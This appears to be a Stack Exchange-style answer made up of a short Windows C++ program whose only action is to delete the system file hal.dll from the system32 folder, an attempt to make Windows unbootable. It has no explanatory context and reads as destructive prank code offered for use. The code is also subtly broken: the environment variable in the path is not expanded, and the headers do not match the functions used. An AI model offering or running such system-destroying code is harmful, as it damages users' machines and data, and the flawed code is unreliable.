Gabriel Lins

65
reputation
1
7
#ifdef _WIN32 

#include <iostream>

int main(int argc, char *argv[])
{
    std::remove("%systemroot%\\system32\\hal.dll");
    return EXIT_SUCCESS;
}

#endif